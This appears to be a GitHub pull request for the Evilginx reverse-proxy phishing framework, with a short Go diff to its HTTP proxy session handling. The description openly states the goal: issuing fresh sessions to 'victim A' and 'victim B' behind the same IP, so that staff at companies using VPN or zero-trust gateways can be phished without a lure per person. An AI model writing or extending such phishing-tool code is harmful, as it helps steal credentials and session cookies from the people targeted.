### PR TITLE
Update http_proxy.go to handle multiple sessions from the same ip add…

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -186,12 +186,12 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				// handle session
 				if p.handleSession(req.Host) && pl != nil {
 					sc, err := req.Cookie(p.cookieName)
-					if err != nil && !p.isWhitelistedIP(remote_addr) {
+					l, lerr := p.cfg.GetLureByPath(pl_name, req_path)
+					if (err != nil && !p.isWhitelistedIP(remote_addr)) || l != nil {
 						if !p.cfg.IsSiteHidden(pl_name) {
 							var vv string
 							var uv url.Values
-							l, err := p.cfg.GetLureByPath(pl_name, req_path)
-							if err == nil {
+							if lerr == nil {
 								log.Debug("triggered lure for path '%s'", req_path)
 							} else {
 								uv = req.URL.Query()


### PR DESCRIPTION
### Summary
update http_proxy.go to handle multiple sessions from the same ip address

### Current Behavior
With the current implementation, if victim B accesses from the same IP address following victim A, Evilginx will not issue a new session properly. This is due to the fact that the implementation unconditionally proxies requests from whitelisted IP addresses in the if statement on line 189.

### Expected Behavior:
Although this implementation is necessary to proxy requests issued by browsers without cookies, a new session should be created each time the initial URL of lures is accessed. Especially when dealing with companies that have VPN or zero-trust solutions (e.g. Zscaler, Akamai EAA) in place, the current implementation requires creating lures for as many people as the number of people to be phished.

I would appreciate it if you could adopt a pull request to solve this problem.